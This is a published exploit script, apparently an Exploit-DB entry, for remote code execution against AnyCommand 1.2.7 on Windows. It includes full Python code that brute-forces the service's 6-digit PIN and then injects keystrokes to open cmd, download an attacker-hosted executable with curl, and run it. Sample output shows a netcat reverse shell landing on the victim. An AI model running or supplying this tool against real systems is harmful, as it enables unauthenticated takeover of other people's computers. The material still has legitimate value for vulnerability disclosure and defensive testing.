# Exploit Title: AnyCommand 1.2.7 - Remote Code Execution # Date: 29/06/25 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://anycommand.io/ # Software Link: https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download # Version: 1.2.7 # Tested on: Windows 10 ''' Description: AnyCommand 1.2.7 contains critical vulnerabilities enabling unauthenticated attackers to achieve remote code execution. The exploit bypasses weak 6-digit PIN authentication through bruteforcing, then abuses the command interface to simulate keystrokes for command execution and payload delivery. This two-stage attack (PIN cracking followed by arbitrary command execution) requires only network access to the vulnerable service and leads to full system compromise. usage: python exp.py --bruteforce --host 192.168.8.105 [*] Bruteforcing PINs from 0 to 999999 (total: 1000000) [*] Press Ctrl+C to stop [>] Progress: 80.3% | Current PIN: 803429 [+] SUCCESS! Found PIN: 803477 [+] Use this PIN: --pin 803477 python exp.py --pin 803477 --lhost 192.168.8.100 --host 192.168.8.105 [*] Connected. Authenticating... [✓] Authentication successful [+] Payload executed. Waiting for connection... [+] Exploit completed successfully nc -lnvp 4444 Listening on 0.0.0.0 4444 Connection received on 192.168.8.105 50459 Microsoft Windows [Version 10.0.19045.5011] (c) Microsoft Corporation. All rights reserved. C:\\Users\\hack> ''' import socket import json import time import argparse import sys def send_line(sock, message): sock.sendall((message + "\n").encode()) def send_text(sock, text, delay=0.05): for char in text: if char == ':': send_line(sock, "TYPE::") elif char == '&': send_line(sock, "TYPE:&") elif char == ' ': send_line(sock, "KEY:space") else: send_line(sock, f"KEY:{char}") time.sleep(delay) def recv_quick(sock, timeout=1.0): sock.settimeout(timeout) try: data = sock.recv(1024).decode(errors='ignore').strip() return data except: return "" finally: sock.settimeout(None) def try_pin(host, port, pin_str): try: sock = socket.socket() sock.settimeout(2.0) sock.connect((host, port)) data = recv_quick(sock) if not data: return False formats = [ json.dumps({"pin": pin_str}), json.dumps({"auth": {"pin": pin_str}}) ] for payload in formats: sock.sendall((payload + "\n").encode()) response = recv_quick(sock) if "AUTH_SUCCESS" in response: return True return False except: return False finally: sock.close() def bruteforce(host, port, start=0, end=999999): total = end - start + 1 found_pin = None last_update = time.time() update_interval = 0.5 print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})") print("[*] Press Ctrl+C to stop") try: for i, pin in enumerate(range(start, end + 1)): pin_str = str(pin).zfill(6) current_time = time.time() if current_time - last_update > update_interval: progress = (i / total) * 100 print(f"\r[>] Progress: {progress:.1f}% | Current PIN: {pin_str}", end='', flush=True) last_update = current_time if try_pin(host, port, pin_str): found_pin = pin_str print(f"\n[+] SUCCESS! Found PIN: {found_pin}") break except KeyboardInterrupt: print("\n[!] Bruteforce interrupted by user") if not found_pin: print("\n[-] Bruteforce completed. No valid PIN found.") return found_pin def execute_payload(host, port, pin, lhost, payload): try: sock = socket.create_connection((host, port), timeout=5) print("[*] Connected. Authenticating...") if recv_quick(sock) != "AUTH_REQUIRED": return False formats = [ json.dumps({"pin": pin}), json.dumps({"auth": {"pin": pin}}) ] for payload_format in formats: sock.sendall((payload_format + "\n").encode()) response = recv_quick(sock) if "AUTH_SUCCESS" in response: print("[✓] Authentication successful") send_line(sock, "KEY:win") time.sleep(1) send_text(sock, "cmd", delay=0.5) time.sleep(1) send_line(sock, "KEY:enter") time.sleep(1) download_cmd = f"curl {lhost}/{payload} -o \\Windows\\Temp\\{payload}" send_text(sock, download_cmd, delay=0.3) time.sleep(0.5) send_line(sock, "KEY:enter") time.sleep(1) exec_cmd = f"\\Windows\\Temp\\{payload}" send_text(sock, exec_cmd, delay=0.3) time.sleep(0.5) send_line(sock, "KEY:enter") print("[+] Payload executed. Waiting for connection...") time.sleep(3) return True print("[-] Authentication failed") return False except Exception as e: print(f"[!] Error: {e}") return False finally: sock.close() def main(): parser = argparse.ArgumentParser(description='AnyCommand Exploit by blue0x1(chokri hammedi) \n') parser.add_argument('--host', required=True, help='Target IP address') parser.add_argument('--port', type=int, default=8000, help='Target port') parser.add_argument('--lhost', help='Attacker IP for payload delivery') parser.add_argument('--payload', default='shell.exe', help='Payload filename') parser.add_argument('--pin', help='Specific PIN to try') parser.add_argument('--bruteforce', action='store_true', help='Bruteforce PIN') args = parser.parse_args() if args.bruteforce: found_pin = bruteforce(args.host, args.port, 0, 999999) if found_pin: print(f"[+] Use this PIN: --pin {found_pin}") elif args.pin: if not args.lhost: print("[-] Please specify --lhost for payload delivery") sys.exit(1) if execute_payload(args.host, args.port, args.pin, args.lhost, args.payload): print("[+] Exploit completed successfully") else: print("[-] Exploit failed") else: print("[-] Please specify either --pin or --bruteforce") sys.exit(1) if __name__ == "__main__": main()